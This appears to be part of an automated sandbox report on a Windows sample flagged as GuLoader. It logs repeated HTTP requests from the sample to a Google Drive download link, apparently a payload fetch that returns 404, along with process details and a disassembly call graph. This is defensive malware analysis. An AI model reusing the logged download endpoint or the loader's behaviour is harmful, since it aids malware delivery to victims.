                                                        2025-01-10 14:48:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 74 45 74 39 57 63 71 38 4f 44 79 42 39 6c 4b 4d 35 38 67 4d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1tEt9Wcq8ODyB9lKM58gMQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.1050001216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:49:08 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:49:09 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:49:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-UVNSDBokgsPA_WaeLysUvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.1050002142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:49:10 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:49:10 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSCJ0CEuzDYm6Klb4lrXOsf8cKvccB7_q787hIwO3Dj8GnFgROR19xNdvHpd4WG1yozSIXegqg
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:49:10 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-JJ1laMfvhX3zc0zHtcBuEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:49:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 51 42 4f 32 67 5f 6f 6f 50 4e 6c 46 4f 42 65 43 42 70 4e 33 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DQBO2g_ooPNlFOBeCBpN3w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.1050003216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:49:21 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:49:21 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:49:21 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-ajgtClTYE925a07agwzRfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.1050004142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:49:22 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:49:22 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSy1U1zotXclJKC8czv1cIajmNFNncshnkwjJpZgsrD17TNyGawu3-Ad9UPCsPJV0vftJSPSjo
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:49:22 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-YVPSMvVXLn1tEjwt4znyMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:49:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 6c 41 36 6e 77 69 54 5f 72 45 39 6a 55 71 79 43 7a 4a 68 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hlA6nwiT_rE9jUqyCzJhcA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:09:46:16
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\fTSt7dc60O.exe"
                                                        Imagebase:0x400000
                                                        File size:540'745 bytes
                                                        MD5 hash:0EECC852B848039DA55141FB43DD01E2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1432262066.000000000551B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:09:46:29
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\fTSt7dc60O.exe"
                                                        Imagebase:0x400000
                                                        File size:540'745 bytes
                                                        MD5 hash:0EECC852B848039DA55141FB43DD01E2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3153038380.000000000219B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:20.5%
                                                          Dynamic/Decrypted Code Coverage:14.4%
                                                          Signature Coverage:19.3%
                                                          Total number of Nodes:1469
                                                          Total number of Limit Nodes:39
                                                          execution_graph 4848 10001000 4851 1000101b 4848->4851 4858 10001516 4851->4858 4853 10001020 4854 10001024 4853->4854 4855 10001027 GlobalAlloc 4853->4855 4856 1000153d 3 API calls 4854->4856 4855->4854 4857 10001019 4856->4857 4860 1000151c 4858->4860 4859 10001522 4859->4853 4860->4859 4861 1000152e GlobalFree 4860->4861 4861->4853 4862 401d41 GetDC GetDeviceCaps 4863 402b1d 18 API calls 4862->4863 4864 401d5f MulDiv ReleaseDC 4863->4864 4865 402b1d 18 API calls 4864->4865 4866 401d7e 4865->4866 4867 405f6a 18 API calls 4866->4867 4868 401db7 CreateFontIndirectW 4867->4868 4869 4024e8 4868->4869 4870 4029c1 InvalidateRect 4871 4029c7 4870->4871 3913 403cc2 3914 403e15 3913->3914 3915 403cda 3913->3915 3916 403e26 GetDlgItem GetDlgItem 3914->3916 3925 403e66 3914->3925 3915->3914 3917 403ce6 3915->3917 3920 40419a 19 API calls 3916->3920 3918 403cf1 SetWindowPos 3917->3918 3919 403d04 3917->3919 3918->3919 3922 403d21 3919->3922 3923 403d09 ShowWindow 3919->3923 3924 403e50 SetClassLongW 3920->3924 3921 403ec0 3931 403e10 3921->3931 3983 4041e6 3921->3983 3927 403d43 3922->3927 3928 403d29 DestroyWindow 3922->3928 3923->3922 3929 40140b 2 API calls 3924->3929 3925->3921 3930 401389 2 API calls 3925->3930 3933 403d48 SetWindowLongW 3927->3933 3934 403d59 3927->3934 3932 404123 3928->3932 3929->3925 3935 403e98 3930->3935 3932->3931 3941 404154 ShowWindow 3932->3941 3933->3931 3938 403e02 3934->3938 3939 403d65 GetDlgItem 3934->3939 3935->3921 3940 403e9c SendMessageW 3935->3940 3936 40140b 2 API calls 3954 403ed2 3936->3954 3937 404125 DestroyWindow EndDialog 3937->3932 4002 404201 3938->4002 3942 403d95 3939->3942 3943 403d78 SendMessageW IsWindowEnabled 3939->3943 3940->3931 3941->3931 3946 403da2 3942->3946 3947 403db5 3942->3947 3948 403de9 SendMessageW 3942->3948 3957 403d9a 3942->3957 3943->3931 3943->3942 3945 405f6a 18 API calls 3945->3954 3946->3948 3946->3957 3951 403dd2 3947->3951 3952 403dbd 3947->3952 3948->3938 3950 40419a 19 API calls 3950->3954 3956 40140b 2 API calls 3951->3956 3996 40140b 3952->3996 3953 403dd0 3953->3938 3954->3931 3954->3936 3954->3937 3954->3945 3954->3950 3974 404065 DestroyWindow 3954->3974 3986 40419a 3954->3986 3958 403dd9 3956->3958 3999 404173 3957->3999 3958->3938 3958->3957 3960 403f4d GetDlgItem 3961 403f62 3960->3961 3962 403f6a ShowWindow KiUserCallbackDispatcher 3960->3962 3961->3962 3989 4041bc KiUserCallbackDispatcher 3962->3989 3964 403f94 EnableWindow 3967 403fa8 3964->3967 3965 403fad GetSystemMenu EnableMenuItem SendMessageW 3966 403fdd SendMessageW 3965->3966 3965->3967 3966->3967 3967->3965 3990 4041cf SendMessageW 3967->3990 3991 405f48 lstrcpynW 3967->3991 3970 40400b lstrlenW 3971 405f6a 18 API calls 3970->3971 3972 404021 SetWindowTextW 3971->3972 3992 401389 3972->3992 3974->3932 3975 40407f CreateDialogParamW 3974->3975 3975->3932 3976 4040b2 3975->3976 3977 40419a 19 API calls 3976->3977 3978 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3977->3978 3979 401389 2 API calls 3978->3979 3980 404103 3979->3980 3980->3931 3981 40410b ShowWindow 3980->3981 3982 4041e6 SendMessageW 3981->3982 3982->3932 3984 4041fe 3983->3984 3985 4041ef SendMessageW 3983->3985 3984->3954 3985->3984 3987 405f6a 18 API calls 3986->3987 3988 4041a5 SetDlgItemTextW 3987->3988 3988->3960 3989->3964 3990->3967 3991->3970 3994 401390 3992->3994 3993 4013fe 3993->3954 3994->3993 3995 4013cb MulDiv SendMessageW 3994->3995 3995->3994 3997 401389 2 API calls 3996->3997 3998 401420 3997->3998 3998->3957 4000 404180 SendMessageW 3999->4000 4001 40417a 3999->4001 4000->3953 4001->4000 4003 404219 GetWindowLongW 4002->4003 4004 4042a2 4002->4004 4003->4004 4005 40422a 4003->4005 4004->3931 4006 404239 GetSysColor 4005->4006 4007 40423c 4005->4007 4006->4007 4008 404242 SetTextColor 4007->4008 4009 40424c SetBkMode 4007->4009 4008->4009 4010 404264 GetSysColor 4009->4010 4011 40426a 4009->4011 4010->4011 4012 404271 SetBkColor 4011->4012 4013 40427b 4011->4013 4012->4013 4013->4004 4014 404295 CreateBrushIndirect 4013->4014 4015 40428e DeleteObject 4013->4015 4014->4004 4015->4014 4872 401a42 4873 402b1d 18 API calls 4872->4873 4874 401a48 4873->4874 4875 402b1d 18 API calls 4874->4875 4876 4019f0 4875->4876 4877 402746 4878 402741 4877->4878 4878->4877 4879 402756 FindNextFileW 4878->4879 4880 4027a8 4879->4880 4882 402761 4879->4882 4880->4882 4883 405f48 lstrcpynW 4880->4883 4883->4882 4884 401cc6 4885 402b1d 18 API calls 4884->4885 4886 401cd9 SetWindowLongW 4885->4886 4887 4029c7 4886->4887 4159 401dc7 4167 402b1d 4159->4167 4161 401dcd 4162 402b1d 18 API calls 4161->4162 4163 401dd6 4162->4163 4164 401de8 EnableWindow 4163->4164 4165 401ddd ShowWindow 4163->4165 4166 4029c7 4164->4166 4165->4166 4168 405f6a 18 API calls 4167->4168 4169 402b31 4168->4169 4169->4161 4888 401bca 4889 402b1d 18 API calls 4888->4889 4890 401bd1 4889->4890 4891 402b1d 18 API calls 4890->4891 4892 401bdb 4891->4892 4893 401beb 4892->4893 4894 402b3a 18 API calls 4892->4894 4895 401bfb 4893->4895 4896 402b3a 18 API calls 4893->4896 4894->4893 4897 401c06 4895->4897 4898 401c4a 4895->4898 4896->4895 4900 402b1d 18 API calls 4897->4900 4899 402b3a 18 API calls 4898->4899 4902 401c4f 4899->4902 4901 401c0b 4900->4901 4903 402b1d 18 API calls 4901->4903 4904 402b3a 18 API calls 4902->4904 4905 401c14 4903->4905 4906 401c58 FindWindowExW 4904->4906 4907 401c3a SendMessageW 4905->4907 4908 401c1c SendMessageTimeoutW 4905->4908 4909 401c7a 4906->4909 4907->4909 4908->4909 4192 4014cb 4193 4051f2 25 API calls 4192->4193 4194 4014d2 4193->4194 4910 40194b 4911 402b1d 18 API calls 4910->4911 4912 401952 4911->4912 4913 402b1d 18 API calls 4912->4913 4914 40195c 4913->4914 4915 402b3a 18 API calls 4914->4915 4916 401965 4915->4916 4917 401979 lstrlenW 4916->4917 4918 4019b5 4916->4918 4919 401983 4917->4919 4919->4918 4923 405f48 lstrcpynW 4919->4923 4921 40199e 4921->4918 4922 4019ab lstrlenW 4921->4922 4922->4918 4923->4921 4924 40434b 4925 404359 4924->4925 4926 40419a 19 API calls 4925->4926 4927 4043b6 4926->4927 4928 40419a 19 API calls 4927->4928 4929 4043c3 CheckDlgButton 4928->4929 4937 4041bc KiUserCallbackDispatcher 4929->4937 4931 4043e1 GetDlgItem 4938 4041cf SendMessageW 4931->4938 4933 4043f7 SendMessageW 4934 404414 GetSysColor 4933->4934 4935 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4933->4935 4934->4935 4936 4045c3 4935->4936 4937->4931 4938->4933 4939 4024cc 4940 402b3a 18 API calls 4939->4940 4941 4024d3 4940->4941 4944 405bb4 GetFileAttributesW CreateFileW 4941->4944 4943 4024df 4944->4943 4945 40164d 4946 402b3a 18 API calls 4945->4946 4947 401653 4946->4947 4948 40628b 2 API calls 4947->4948 4949 401659 4948->4949 4950 4019cf 4951 402b3a 18 API calls 4950->4951 4952 4019d6 4951->4952 4953 402b3a 18 API calls 4952->4953 4954 4019df 4953->4954 4955 4019e6 lstrcmpiW 4954->4955 4956 4019f8 lstrcmpW 4954->4956 4957 4019ec 4955->4957 4956->4957 4958 401e51 4959 402b3a 18 API calls 4958->4959 4960 401e57 4959->4960 4961 4051f2 25 API calls 4960->4961 4962 401e61 4961->4962 4963 4056c3 2 API calls 4962->4963 4964 401e67 4963->4964 4965 401ec6 CloseHandle 4964->4965 4966 401e77 WaitForSingleObject 4964->4966 4968 402793 4964->4968 4965->4968 4967 401e89 4966->4967 4969 401e9b GetExitCodeProcess 4967->4969 4970 4062eb 2 API calls 4967->4970 4971 401eb8 4969->4971 4972 401ead 4969->4972 4973 401e90 WaitForSingleObject 4970->4973 4971->4965 4975 405e8f wsprintfW 4972->4975 4973->4967 4975->4971 4251 401752 4252 402b3a 18 API calls 4251->4252 4253 401759 4252->4253 4254 401781 4253->4254 4255 401779 4253->4255 4307 405f48 lstrcpynW 4254->4307 4306 405f48 lstrcpynW 4255->4306 4258 40177f 4262 4061dc 5 API calls 4258->4262 4259 40178c 4260 405993 3 API calls 4259->4260 4261 401792 lstrcatW 4260->4261 4261->4258 4268 40179e 4262->4268 4263 4017da 4265 405b8f 2 API calls 4263->4265 4264 40628b 2 API calls 4264->4268 4265->4268 4267 4017b0 CompareFileTime 4267->4268 4268->4263 4268->4264 4268->4267 4269 401870 4268->4269 4272 405f48 lstrcpynW 4268->4272 4278 405f6a 18 API calls 4268->4278 4287 401847 4268->4287 4290 405bb4 GetFileAttributesW CreateFileW 4268->4290 4308 405724 4268->4308 4270 4051f2 25 API calls 4269->4270 4273 40187a 4270->4273 4271 4051f2 25 API calls 4289 40185c 4271->4289 4272->4268 4291 403062 4273->4291 4275 4018a1 SetFileTime 4277 4018b3 CloseHandle 4275->4277 4279 4018c4 4277->4279 4277->4289 4278->4268 4280 4018c9 4279->4280 4281 4018dc 4279->4281 4282 405f6a 18 API calls 4280->4282 4283 405f6a 18 API calls 4281->4283 4285 4018d1 lstrcatW 4282->4285 4286 4018e4 4283->4286 4285->4286 4288 405724 MessageBoxIndirectW 4286->4288 4287->4271 4287->4289 4288->4289 4290->4268 4292 403072 SetFilePointer 4291->4292 4293 40308e 4291->4293 4292->4293 4312 40317d GetTickCount 4293->4312 4296 405c37 ReadFile 4297 4030ae 4296->4297 4298 40317d 43 API calls 4297->4298 4305 40188d 4297->4305 4299 4030c5 4298->4299 4300 4030d5 4299->4300 4301 40313f ReadFile 4299->4301 4299->4305 4303 405c37 ReadFile 4300->4303 4304 403108 WriteFile 4300->4304 4300->4305 4301->4305 4303->4300 4304->4300 4304->4305 4305->4275 4305->4277 4306->4258 4307->4259 4309 405739 4308->4309 4310 405785 4309->4310 4311 40574d MessageBoxIndirectW 4309->4311 4310->4268 4311->4310 4313 4032e7 4312->4313 4314 4031ac 4312->4314 4316 402d1a 33 API calls 4313->4316 4325 40330f SetFilePointer 4314->4325 4321 403095 4316->4321 4317 4031b7 SetFilePointer 4323 4031dc 4317->4323 4321->4296 4321->4305 4322 403271 WriteFile 4322->4321 4322->4323 4323->4321 